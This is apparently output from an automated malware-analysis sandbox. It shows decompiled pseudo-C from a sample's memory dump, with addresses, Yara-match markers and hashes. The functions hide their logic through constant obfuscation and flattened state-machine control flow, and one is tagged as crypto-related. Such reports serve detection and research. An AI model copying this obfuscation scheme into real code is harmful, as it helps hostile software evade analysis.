				_v624 = _v624 ^ 0x2080664e;
				_v624 = _v624 + 0xffff6d42;
				_v624 = _v624 ^ 0x209d403f;
				_v576 = 0x1158bb;
				_v576 = _v576 + 0xee37;
				_v576 = _v576 * 0x58;
				_v576 = _v576 ^ 0x064c7012;
				_v604 = 0x2baa3d;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x98e766b9;
				_v604 = _v604 + 0x4c48;
				_v604 = _v604 ^ 0x98e41f98;
				_v620 = 0x6fa6d6;
				_v620 = _v620 >> 5;
				_v620 = _v620 / _t282;
				_v620 = _v620 | 0xc886e261;
				_v620 = _v620 ^ 0xc88dbbb8;
				_v548 = 0xe0fc73;
				_v548 = _v548 ^ 0x2ac40ca3;
				_v548 = _v548 ^ 0x2a287985;
				_v584 = 0xee5cba;
				_v584 = _v584 + 0xffffcff7;
				_v584 = _v584 + 0x6b95;
				_v584 = _v584 ^ 0x00e7dbe3;
				_v608 = 0x5f419;
				_v608 = _v608 >> 5;
				_t283 = 0x78;
				_v608 = _v608 * 0x3c;
				_v608 = _v608 ^ 0x09e1dc53;
				_v608 = _v608 ^ 0x09eb01c0;
				_v592 = 0x96a372;
				_v592 = _v592 >> 9;
				_v592 = _v592 ^ 0x6810639e;
				_v592 = _v592 ^ 0x681d828a;
				_v560 = 0x258dfe;
				_v560 = _v560 + 0xfffffbd8;
				_v560 = _v560 ^ 0x002ff2dd;
				_v600 = 0x31486b;
				_v600 = _v600 >> 3;
				_v600 = _v600 + 0xaca7;
				_v600 = _v600 ^ 0x3dc26e9c;
				_v600 = _v600 ^ 0x3dc4b11b;
				_v596 = 0x8b5ce6;
				_v596 = _v596 / _t283;
				_v596 = _v596 | 0xf2a89978;
				_v596 = _v596 ^ 0xf2adb690;
				_v540 = 0x143903;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000236aa;
				_v536 = 0x86688b;
				_t284 = 0x22;
				_v536 = _v536 * 0x2c;
				_v536 = _v536 ^ 0x171ea9c6;
				_v544 = 0xdb9b0;
				_v544 = _v544 | 0xe72e2065;
				_v544 = _v544 ^ 0xe727c8fd;
				_v568 = 0x9bfe95;
				_v568 = _v568 | 0x6ff05444;
				_t285 = _v524;
				_v568 = _v568 / _t284;
				_v568 = _v568 ^ 0x03415ea7;
				_v552 = 0x5d2fe7;
				_v552 = _v552 << 0x10;
				_v552 = _v552 ^ 0x2fe7e899;
				goto L1;
				do {
					while(1) {
						L1:
						_t291 = _t256 - 0x9d45361;
						if(_t291 > 0) {
							break;
						}
						if(_t291 == 0) {
							E0122855C( &_v520, _v560, __eflags, _v600, _v596, _t256, _v540);
							 *((intOrPtr*)( *0x1235218 + 0x448)) = E0122BD02(_v536, _v544, _v568, _v552);
							L22:
							return _t286;
						}
						if(_t256 == 0xb87700) {
							_t256 = 0x3925c38;
							_v524 = _v612;
							continue;
						}
						if(_t256 == 0x2f2f5f6) {
							_push(_t256);
							_push(_t256);
							_t250 = E01225212(0x450);
							_t288 =  &(_t288[3]);
							 *0x1235218 = _t250;
							_t256 = 0xedae1a9;
							continue;
						}
						if(_t256 == 0x3925c38) {
							E0121EDC5(_v576, _t285, _v604, _v620);
							_t256 = 0xddbf72d;
							continue;
						}
						if(_t256 != 0x85025e3) {
							goto L19;
						}
						E01218D80();
						_t256 = 0x9d45361;
					}
					__eflags = _t256 - 0xc174429;
					if(_t256 == 0xc174429) {
						_t256 = 0xddbf72d;
						_v524 = _v532;
						goto L19;
					}
					__eflags = _t256 - 0xddbf72d;
					if(_t256 == 0xddbf72d) {
						_t240 = E0121B3B4(_v548, _t256, _v584, _t256, _v608,  *0x1235218 + 0x18, _v592, _v524);
						_t288 =  &(_t288[7]);
						_t256 = 0x85025e3;
						__eflags = _t240;
						_t241 = 1;
						_t286 =  ==  ? _t241 : _t286;
						goto L1;
					}
					__eflags = _t256 - 0xedae1a9;
					if(_t256 != 0xedae1a9) {
						goto L19;
					}
					_t253 = E0121ACDB(_t256, _v564, _v616, _v580, _t256, _v624);
					_t285 = _t253;
					_t288 =  &(_t288[4]);
					__eflags = _t253;
					if(__eflags == 0) {
						_t256 = 0xc174429;
					} else {
						 *((intOrPtr*)( *0x1235218 + 0x43c)) = 1;
						_t256 = 0xb87700;
					}
					goto L1;
					L19:
					__eflags = _t256 - 0x18ee40e;
				} while (__eflags != 0);
				goto L22;
			}











































                          0x012210cd
                          0x012210d3
                          0x012210dd
                          0x012210e5
                          0x012210ea
                          0x012210f2
                          0x01221104
                          0x01221109
                          0x0122110f
                          0x01221117
                          0x01221119
                          0x01221121
                          0x01221129
                          0x01221131
                          0x01221139
                          0x0122113e
                          0x01221146
                          0x0122114e
                          0x01221156
                          0x0122115e
                          0x01221166
                          0x01221172
                          0x01221177
                          0x0122117d
                          0x01221182
                          0x0122118a
                          0x01221192
                          0x01221197
                          0x0122119f
                          0x012211ac
                          0x012211ad
                          0x012211b1
                          0x012211b9
                          0x012211c1
                          0x012211c6
                          0x012211ce
                          0x012211d6
                          0x012211de
                          0x012211e6
                          0x012211ee
                          0x012211f6
                          0x012211fe
                          0x01221206
                          0x0122120e
                          0x01221216
                          0x0122121e
                          0x01221226
                          0x01221233
                          0x01221237
                          0x0122123f
                          0x01221247
                          0x0122124c
                          0x01221254
                          0x0122125c
                          0x01221264
                          0x0122126c
                          0x01221277
                          0x0122127b
                          0x01221283
                          0x0122128b
                          0x01221293
                          0x0122129b
                          0x012212a3
                          0x012212ab
                          0x012212b3
                          0x012212bd
                          0x012212ca
                          0x012212d7
                          0x012212e3
                          0x012212e6
                          0x012212ea
                          0x012212f2
                          0x012212fa
                          0x01221302
                          0x01221307
                          0x0122130f
                          0x01221317
                          0x0122131f
                          0x01221327
                          0x0122132f
                          0x01221337
                          0x0122133c
                          0x01221344
                          0x0122134c
                          0x01221354
                          0x01221364
                          0x01221368
                          0x01221370
                          0x01221378
                          0x01221380
                          0x01221385
                          0x0122138d
                          0x0122139a
                          0x0122139b
                          0x0122139f
                          0x012213a7
                          0x012213af
                          0x012213b7
                          0x012213bf
                          0x012213c7
                          0x012213d5
                          0x012213d9
                          0x012213dd
                          0x012213e5
                          0x012213ed
                          0x012213f2
                          0x012213f2
                          0x012213fa
                          0x012213fa
                          0x012213fa
                          0x012213fa
                          0x012213fc
                          0x00000000
                          0x00000000
                          0x01221402
                          0x01221551
                          0x0122157e
                          0x01221585
                          0x01221590
                          0x01221590
                          0x0122140e
                          0x0122147d
                          0x01221482
                          0x00000000
                          0x01221482
                          0x01221416
                          0x0122145e
                          0x0122145f
                          0x01221465
                          0x0122146a
                          0x0122146d
                          0x01221472
                          0x00000000
                          0x01221472
                          0x0122141e
                          0x01221443
                          0x0122144a
                          0x00000000
                          0x0122144a
                          0x01221426
                          0x00000000
                          0x00000000
                          0x0122142c
                          0x01221431
                          0x01221431
                          0x0122148b
                          0x01221491
                          0x01221525
                          0x01221527
                          0x00000000
                          0x01221527
                          0x01221497
                          0x01221499
                          0x01221507
                          0x0122150c
                          0x0122150f
                          0x01221514
                          0x01221518
                          0x01221519
                          0x00000000
                          0x01221519
                          0x0122149b
                          0x012214a1
                          0x00000000
                          0x00000000
                          0x012214b8
                          0x012214bd
                          0x012214bf
                          0x012214c2
                          0x012214c4
                          0x012214de
                          0x012214c6
                          0x012214ce
                          0x012214d4
                          0x012214d4
                          0x00000000
                          0x0122152b
                          0x0122152b
                          0x0122152b
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7$HL$NN$e .$fd$kH1$/]
                          • API String ID: 0-3661360838
                          • Opcode ID: 8bf267bcf2330fb14550a24b9bb81f59775b6deb9905ad80e02f219a4548eb70
                          • Instruction ID: f49f295f3fd2246f92f64274331c7b232447bd8827604b887ac7458a7bce2393
                          • Opcode Fuzzy Hash: 8bf267bcf2330fb14550a24b9bb81f59775b6deb9905ad80e02f219a4548eb70
                          • Instruction Fuzzy Hash: 8AC13271118381ABC368CF29D98A81FBBF1FBC4758F508A1DF29696260C7B58959CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121F73B, Relevance: 8.9, Strings: 7, Instructions: 181COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E0121F73B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				intOrPtr _v564;
				char _v592;
				signed int _v596;
				intOrPtr _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				void* __ecx;
				void* _t148;
				void* _t159;
				signed int _t162;
				signed int _t163;
				void* _t171;
				signed int _t175;
				intOrPtr _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int* _t198;

				_t191 = _a16;
				_push(_t191);
				_push(_a12);
				_push(_a8);
				_push(E012227C2);
				_push(__edx);
				E0121358A(_t148);
				_v596 = _v596 & 0x00000000;
				_t198 =  &(( &_v660)[6]);
				_v600 = 0x402688;
				_v604 = 0x25492e;
				_t171 = 0xdac63a8;
				_v604 = _v604 | 0xaef4ed6a;
				_v604 = _v604 ^ 0xaef5ed6c;
				_v652 = 0x2838e9;
				_v652 = _v652 >> 0xa;
				_v652 = _v652 << 3;
				_v652 = _v652 | 0x614731bf;
				_v652 = _v652 ^ 0x614bd185;
				_v624 = 0xf4693d;
				_v624 = _v624 << 0xb;
				_v624 = _v624 << 2;
				_v624 = _v624 ^ 0x8d2695b4;
				_v632 = 0x9094e4;
				_v632 = _v632 >> 4;
				_t192 = 0x68;
				_v632 = _v632 * 0x24;
				_v632 = _v632 ^ 0x014e1cf6;
				_v644 = 0xe7f27d;
				_v644 = _v644 + 0xffffaae4;
				_v644 = _v644 + 0x4248;
				_v644 = _v644 * 0x59;
				_v644 = _v644 ^ 0x50912620;
				_v616 = 0xe211d0;
				_v616 = _v616 / _t192;
				_v616 = _v616 ^ 0x000f0337;
				_v612 = 0x41d4d;
				_t193 = 0x6d;
				_v612 = _v612 / _t193;
				_v612 = _v612 ^ 0x000a96e0;
				_v660 = 0x59117e;
				_v660 = _v660 + 0xffff20e1;
				_v660 = _v660 >> 4;
				_v660 = _v660 + 0x7439;
				_v660 = _v660 ^ 0x0009be27;
				_v636 = 0x1369d9;
				_v636 = _v636 + 0xffffda73;
				_v636 = _v636 + 0xffff9758;
				_v636 = _v636 ^ 0x001025fd;
				_v648 = 0x727c60;
				_v648 = _v648 << 0xe;
				_v648 = _v648 ^ 0xf402b4e8;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 ^ 0x0009ed3b;
				_v656 = 0xc32e83;
				_v656 = _v656 << 0xf;
				_v656 = _v656 << 0xe;
				_t194 = 0x67;
				_v656 = _v656 / _t194;
				_v656 = _v656 ^ 0x00e2da39;
				_v608 = 0x407dcf;
				_v608 = _v608 | 0x4e58c956;
				_v608 = _v608 ^ 0x4e53cb3d;
				_v628 = 0xdc0dfd;
				_v628 = _v628 << 2;
				_v628 = _v628 * 0x29;
				_v628 = _v628 ^ 0x8cfb8f03;
				_v640 = 0x2bb14e;
				_v640 = _v640 << 9;
				_v640 = _v640 << 0xb;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x053e2e8e;
				_v620 = 0x85f6b7;
				_v620 = _v620 >> 9;
				_v620 = _v620 ^ 0x0003e478;
				_t195 = _v620;
				do {
					while(_t171 != 0x36aba09) {
						if(_t171 == 0x38eb3fe) {
							_t162 = E012227C2(_t171,  &_v556,  &_v592);
							asm("sbb ecx, ecx");
							_t175 =  ~_t162 & 0xf8b5f69f;
							L11:
							_t171 = _t175 + 0xab4c36a;
							continue;
						}
						if(_t171 == 0x94e386a) {
							_v556 = 0x22c;
							_t163 = E0121CA5D(_v616,  &_v556, _t195, _v612, _v660, _v636);
							_t198 =  &(_t198[4]);
							asm("sbb ecx, ecx");
							_t175 =  ~_t163 & 0xf8d9f094;
							goto L11;
						}
						if(_t171 == 0xab4c36a) {
							return E01224A33(_v640, _v620, _t195);
						}
						if(_t171 != 0xd5d9899) {
							if(_t171 != 0xdac63a8) {
								goto L16;
							} else {
								_v564 = _t191;
								_t171 = 0xd5d9899;
								continue;
							}
							L19:
							return _t163;
						}
						_push(_t171);
						_push(_t171);
						_t163 = E01231B99(_t171, _t171, _v604);
						_t195 = _t163;
						_t198 =  &(_t198[4]);
						if(_t163 != 0xffffffff) {
							_t171 = 0x94e386a;
							continue;
						}
						goto L19;
					}
					_t159 = E012295C7(_v648,  &_v556, _t195, _v656, _v608, _v628);
					_t198 =  &(_t198[4]);
					if(_t159 == 0) {
						_t171 = 0xab4c36a;
						goto L16;
					} else {
						_t171 = 0x38eb3fe;
						continue;
					}
					goto L19;
					L16:
				} while (_t171 != 0x1f9516d);
				return _t163;
			}



































                          0x0121f745
                          0x0121f74c
                          0x0121f74d
                          0x0121f754
                          0x0121f75b
                          0x0121f760
                          0x0121f762
                          0x0121f767
                          0x0121f76c
                          0x0121f76f
                          0x0121f779
                          0x0121f781
                          0x0121f786
                          0x0121f78e
                          0x0121f796
                          0x0121f79e
                          0x0121f7a3
                          0x0121f7a8
                          0x0121f7b0
                          0x0121f7b8
                          0x0121f7c0
                          0x0121f7c5
                          0x0121f7ca
                          0x0121f7d2
                          0x0121f7da
                          0x0121f7e6
                          0x0121f7e9
                          0x0121f7ed
                          0x0121f7f5
                          0x0121f7fd
                          0x0121f805
                          0x0121f812
                          0x0121f816
                          0x0121f81e
                          0x0121f82e
                          0x0121f832
                          0x0121f83a
                          0x0121f846
                          0x0121f84b
                          0x0121f851
                          0x0121f859
                          0x0121f861
                          0x0121f869
                          0x0121f86e
                          0x0121f876
                          0x0121f87e
                          0x0121f886
                          0x0121f88e
                          0x0121f896
                          0x0121f89e
                          0x0121f8a6
                          0x0121f8ab
                          0x0121f8b3
                          0x0121f8b8
                          0x0121f8c0
                          0x0121f8c8
                          0x0121f8cd
                          0x0121f8d6
                          0x0121f8d9
                          0x0121f8dd
                          0x0121f8e5
                          0x0121f8ed
                          0x0121f8f5
                          0x0121f902
                          0x0121f90f
                          0x0121f919
                          0x0121f91d
                          0x0121f925
                          0x0121f92d
                          0x0121f932
                          0x0121f937
                          0x0121f93c
                          0x0121f944
                          0x0121f94c
                          0x0121f951
                          0x0121f959
                          0x0121f95d
                          0x0121f95d
                          0x0121f96b
                          0x0121fa13
                          0x0121fa1c
                          0x0121fa1e
                          0x0121fa02
                          0x0121fa02
                          0x00000000
                          0x0121fa02
                          0x0121f977
                          0x0121f9d9
                          0x0121f9ee
                          0x0121f9f3
                          0x0121f9fa
                          0x0121f9fc
                          0x00000000
                          0x0121f9fc
                          0x0121f97b
                          0x00000000
                          0x0121fa6c
                          0x0121f987
                          0x0121f98f
                          0x00000000
                          0x0121f995
                          0x0121f995
                          0x0121f999
                          0x00000000
                          0x0121f999
                          0x0121fa77
                          0x0121fa77
                          0x0121fa77
                          0x0121f9b0
                          0x0121f9b1
                          0x0121f9b7
                          0x0121f9bc
                          0x0121f9be
                          0x0121f9c4
                          0x0121f9ca
                          0x00000000
                          0x0121f9ca
                          0x00000000
                          0x0121f9c4
                          0x0121fa3b
                          0x0121fa40
                          0x0121fa45
                          0x0121fa4e
                          0x00000000
                          0x0121fa47
                          0x0121fa47
                          0x00000000
                          0x0121fa47
                          0x00000000
                          0x0121fa50
                          0x0121fa50
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .I%$9t$;$HB$j8N$j8N$8(
                          • API String ID: 0-1563950138
                          • Opcode ID: 50c926542b8ba18ee8dc0ab81d39d4011d910c72da01948dfa1fb0c4499d1db4
                          • Instruction ID: b85b23a7e3cf6b1298b8735b902ed26085de79c8beb002d83796f0c7e4f55c75
                          • Opcode Fuzzy Hash: 50c926542b8ba18ee8dc0ab81d39d4011d910c72da01948dfa1fb0c4499d1db4
                          • Instruction Fuzzy Hash: C18188721193429BC328DF24C58981FBBE1FBD4B48F004A1DF6A696264D3B5CA49CF87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01226540, Relevance: 8.1, Strings: 6, Instructions: 602COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E01226540(signed int __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				void* _t684;
				void* _t688;
				signed int _t689;
				signed int _t694;
				signed int _t697;
				void* _t713;
				void* _t719;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t739;
				void* _t742;
				void* _t754;
				void* _t801;
				signed int _t805;
				signed int* _t806;
				void* _t810;

				_t806 =  &_v2924;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xaa4f49;
				_v2744 = 0x2f620d;
				_v2744 = _v2744 + 0x62d8;
				_v2744 = _v2744 ^ 0x002fc4cc;
				_v2656 = 0x2cfaec;
				_v2656 = _v2656 ^ 0x0cd2161f;
				_v2656 = _v2656 ^ 0x0ceeecf3;
				_v2920 = 0x32c716;
				_v2920 = _v2920 << 0xf;
				_v2920 = _v2920 * 0x3b;
				_t805 = __ecx;
				_v2920 = _v2920 | 0x68b4bac1;
				_t801 = 0x2549caa;
				_v2920 = _v2920 ^ 0xf9b543d8;
				_v2784 = 0x32d4e6;
				_v2784 = _v2784 >> 7;
				_t721 = 0x2c;
				_v2784 = _v2784 / _t721;
				_v2784 = _v2784 ^ 0x0000a674;
				_v2864 = 0xb319fb;
				_v2864 = _v2864 + 0xd9e1;
				_v2864 = _v2864 + 0xffff00cf;
				_v2864 = _v2864 + 0xffffd85e;
				_v2864 = _v2864 ^ 0x00b26dd6;
				_v2660 = 0xb27e25;
				_v2660 = _v2660 + 0xffffdfd3;
				_v2660 = _v2660 ^ 0x00b99797;
				_v2716 = 0xc7fe75;
				_v2716 = _v2716 + 0xffff31f2;
				_v2716 = _v2716 ^ 0x00c78a4c;
				_v2640 = 0xaeac8;
				_v2640 = _v2640 >> 0xe;
				_v2640 = _v2640 ^ 0x000277b4;
				_v2908 = 0x10077a;
				_v2908 = _v2908 + 0x68bd;
				_v2908 = _v2908 + 0xffff2116;
				_v2908 = _v2908 ^ 0xc54851cd;
				_v2908 = _v2908 ^ 0xc544d31b;
				_v2736 = 0x20a398;
				_v2736 = _v2736 + 0xffff0563;
				_v2736 = _v2736 ^ 0x001e08ef;
				_v2780 = 0x1d5a40;
				_v2780 = _v2780 + 0xfffff9c7;
				_v2780 = _v2780 + 0xffff794c;
				_v2780 = _v2780 ^ 0x0014447a;
				_v2916 = 0x29a4cb;
				_v2916 = _v2916 + 0xffff976d;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 ^ 0xd9e702bb;
				_v2916 = _v2916 ^ 0x4a29d2a0;
				_v2892 = 0xf9f655;
				_v2892 = _v2892 | 0x0b15f937;
				_v2892 = _v2892 + 0x9fa5;
				_v2892 = _v2892 << 0xf;
				_v2892 = _v2892 ^ 0x4f87a491;
				_v2804 = 0x8782fc;
				_v2804 = _v2804 ^ 0xdd81eb44;
				_v2804 = _v2804 + 0xffff6092;
				_v2804 = _v2804 ^ 0xdd08276f;
				_v2900 = 0x145bb0;
				_v2900 = _v2900 ^ 0xbb062dbe;
				_v2900 = _v2900 << 0xb;
				_t722 = 0x47;
				_v2900 = _v2900 / _t722;
				_v2900 = _v2900 ^ 0x02171860;
				_v2884 = 0xa0bec9;
				_v2884 = _v2884 + 0xe73b;
				_t723 = 9;
				_v2884 = _v2884 / _t723;
				_v2884 = _v2884 << 5;
				_v2884 = _v2884 ^ 0x023b27f7;
				_v2728 = 0x769a57;
				_v2728 = _v2728 ^ 0xf82d310f;
				_v2728 = _v2728 ^ 0xf85c91ef;
				_v2860 = 0x37f683;
				_v2860 = _v2860 | 0xf0b97ca0;
				_v2860 = _v2860 ^ 0xe1b88346;
				_v2860 = _v2860 | 0x851887c8;
				_v2860 = _v2860 ^ 0x95163fc9;
				_v2868 = 0xd98716;
				_t724 = 0x43;
				_v2868 = _v2868 * 0x4b;
				_v2868 = _v2868 * 0x55;
				_v2868 = _v2868 / _t724;
				_v2868 = _v2868 ^ 0x009101df;
				_v2876 = 0xf11c91;
				_t725 = 0x4b;
				_v2876 = _v2876 / _t725;
				_t726 = 5;
				_v2876 = _v2876 * 0x2a;
				_v2876 = _v2876 >> 1;
				_v2876 = _v2876 ^ 0x004ca641;
				_v2832 = 0x3a7ad7;
				_v2832 = _v2832 + 0xffff0fb3;
				_v2832 = _v2832 ^ 0x7ad81000;
				_v2832 = _v2832 ^ 0x7aee2116;
				_v2844 = 0xc3babb;
				_v2844 = _v2844 >> 7;
				_v2844 = _v2844 ^ 0x8633c317;
				_v2844 = _v2844 ^ 0x863d303c;
				_v2796 = 0xf9f147;
				_v2796 = _v2796 * 0x1f;
				_v2796 = _v2796 * 0x4e;
				_v2796 = _v2796 ^ 0x38ccc6dc;
				_v2720 = 0x9c53e2;
				_v2720 = _v2720 * 0x57;
				_v2720 = _v2720 ^ 0x35251ab4;
				_v2764 = 0x1fe5b6;
				_v2764 = _v2764 | 0x49ac0c10;
				_v2764 = _v2764 * 0x1c;
				_v2764 = _v2764 ^ 0x10f7ba24;
				_v2816 = 0xc0bc9a;
				_v2816 = _v2816 + 0xffff3013;
				_v2816 = _v2816 / _t726;
				_v2816 = _v2816 ^ 0x00296678;
				_v2704 = 0xc38c22;
				_v2704 = _v2704 + 0xffff365c;
				_v2704 = _v2704 ^ 0x00cf5b8a;
				_v2712 = 0x642ede;
				_v2712 = _v2712 >> 0xa;
				_v2712 = _v2712 ^ 0x000e1ac4;
				_v2824 = 0x293da3;
				_v2824 = _v2824 + 0xffff648f;
				_v2824 = _v2824 << 4;
				_v2824 = _v2824 ^ 0x028d8b63;
				_v2792 = 0xe42bc6;
				_v2792 = _v2792 | 0xdbd15fbe;
				_v2792 = _v2792 >> 4;
				_v2792 = _v2792 ^ 0x0db3b95e;
				_v2800 = 0x863821;
				_v2800 = _v2800 >> 1;
				_v2800 = _v2800 + 0xd3a0;
				_v2800 = _v2800 ^ 0x0044dfda;
				_v2808 = 0x925047;
				_v2808 = _v2808 << 1;
				_v2808 = _v2808 ^ 0xaf5f3bf9;
				_v2808 = _v2808 ^ 0xae7db7f1;
				_v2756 = 0xe94a86;
				_v2756 = _v2756 ^ 0xc8b33b3f;
				_v2756 = _v2756 | 0xcc5831a0;
				_v2756 = _v2756 ^ 0xcc58e7e2;
				_v2700 = 0xc5ee34;
				_v2700 = _v2700 ^ 0x0c8e0e62;
				_v2700 = _v2700 ^ 0x0c4df504;
				_v2692 = 0xdacd2e;
				_v2692 = _v2692 | 0x1b4c4552;
				_v2692 = _v2692 ^ 0x1bd43d8f;
				_v2652 = 0x8d1e3c;
				_v2652 = _v2652 | 0x25fd472e;
				_v2652 = _v2652 ^ 0x25f41f2e;
				_v2872 = 0x385869;
				_t727 = 0x67;
				_v2872 = _v2872 * 0x72;
				_v2872 = _v2872 >> 0xf;
				_v2872 = _v2872 | 0xb7fb6a2a;
				_v2872 = _v2872 ^ 0xb7ff0374;
				_v2812 = 0xdd1f2e;
				_v2812 = _v2812 * 0x75;
				_v2812 = _v2812 >> 5;
				_v2812 = _v2812 ^ 0x032df31a;
				_v2740 = 0xea916c;
				_v2740 = _v2740 | 0xee59dc55;
				_v2740 = _v2740 ^ 0xeef8a503;
				_v2676 = 0xf7667b;
				_v2676 = _v2676 | 0x312cb279;
				_v2676 = _v2676 ^ 0x31f069d6;
				_v2684 = 0x26b238;
				_v2684 = _v2684 * 0x38;
				_v2684 = _v2684 ^ 0x08791e35;
				_v2924 = 0x9d8ac4;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 ^ 0xedefc6df;
				_v2924 = _v2924 | 0x7e502baa;
				_v2924 = _v2924 ^ 0xfeda65da;
				_v2888 = 0xed10c6;
				_v2888 = _v2888 << 8;
				_v2888 = _v2888 * 0x24;
				_v2888 = _v2888 >> 0xc;
				_v2888 = _v2888 ^ 0x000919c0;
				_v2664 = 0x1f3552;
				_v2664 = _v2664 / _t727;
				_v2664 = _v2664 ^ 0x000b6060;
				_v2752 = 0x47b9f5;
				_v2752 = _v2752 + 0xffffdbc2;
				_v2752 = _v2752 * 0x52;
				_v2752 = _v2752 ^ 0x16ea1dfc;
				_v2760 = 0x3ff7db;
				_v2760 = _v2760 ^ 0x4f7326af;
				_v2760 = _v2760 | 0xe6039ada;
				_v2760 = _v2760 ^ 0xef494a35;
				_v2768 = 0xda61e4;
				_v2768 = _v2768 ^ 0xde1baa62;
				_v2768 = _v2768 + 0xffffd49f;
				_v2768 = _v2768 ^ 0xdec3f05a;
				_v2688 = 0x5b052b;
				_v2688 = _v2688 | 0xb7018ea2;
				_v2688 = _v2688 ^ 0xb75acc84;
				_v2696 = 0xc8e0b;
				_v2696 = _v2696 + 0x26e;
				_v2696 = _v2696 ^ 0x000fb538;
				_v2776 = 0xe18ab3;
				_t728 = 0x55;
				_v2776 = _v2776 * 0x78;
				_v2776 = _v2776 + 0xffffbb5d;
				_v2776 = _v2776 ^ 0x69bff61f;
				_v2912 = 0xa4fec3;
				_v2912 = _v2912 ^ 0x5d1cdb4c;
				_v2912 = _v2912 + 0xffffd6eb;
				_v2912 = _v2912 + 0xffffe766;
				_v2912 = _v2912 ^ 0x5db0f62f;
				_v2856 = 0x49daf8;
				_v2856 = _v2856 * 0x42;
				_v2856 = _v2856 >> 4;
				_v2856 = _v2856 | 0x138dbc56;
				_v2856 = _v2856 ^ 0x13bbcd08;
				_v2672 = 0xb54fbf;
				_v2672 = _v2672 << 8;
				_v2672 = _v2672 ^ 0xb5430561;
				_v2648 = 0x98267;
				_v2648 = _v2648 + 0xad8e;
				_v2648 = _v2648 ^ 0x000177aa;
				_v2904 = 0x97baa2;
				_v2904 = _v2904 ^ 0x3853038d;
				_v2904 = _v2904 >> 0x10;
				_v2904 = _v2904 ^ 0xc801ad05;
				_v2904 = _v2904 ^ 0xc80c5adf;
				_v2840 = 0xdada91;
				_v2840 = _v2840 >> 5;
				_v2840 = _v2840 + 0xffffcc86;
				_v2840 = _v2840 ^ 0x000ee60b;
				_v2880 = 0x4b131c;
				_v2880 = _v2880 ^ 0x8c36c4d4;
				_t729 = 0x2b;
				_v2880 = _v2880 / _t728;
				_v2880 = _v2880 ^ 0xf9d4cca3;
				_v2880 = _v2880 ^ 0xf87ce1c2;
				_v2828 = 0xc64ac5;
				_v2828 = _v2828 / _t729;
				_v2828 = _v2828 << 0x10;
				_v2828 = _v2828 ^ 0x9c8278ff;
				_v2668 = 0x64007c;
				_v2668 = _v2668 << 1;
				_v2668 = _v2668 ^ 0x00cf46fd;
				_v2732 = 0xb494ea;
				_v2732 = _v2732 ^ 0x89f26255;
				_v2732 = _v2732 ^ 0x894c3b6b;
				_v2772 = 0x969b28;
				_v2772 = _v2772 + 0x56d6;
				_v2772 = _v2772 ^ 0xd5bd63f1;
				_v2772 = _v2772 ^ 0xd52a3e3a;
				_v2820 = 0x13a0c3;
				_v2820 = _v2820 << 0xc;
				_v2820 = _v2820 << 0xd;
				_v2820 = _v2820 ^ 0x8601b35f;
				_v2896 = 0xeae219;
				_v2896 = _v2896 + 0xb714;
				_v2896 = _v2896 + 0xf633;
				_v2896 = _v2896 ^ 0xa59ae388;
				_v2896 = _v2896 ^ 0xa57f69c1;
				_v2644 = 0xfd8482;
				_v2644 = _v2644 ^ 0x7dcc11e0;
				_v2644 = _v2644 ^ 0x7d3a680c;
				_v2788 = 0xfbffea;
				_t730 = 0x7b;
				_v2788 = _v2788 / _t730;
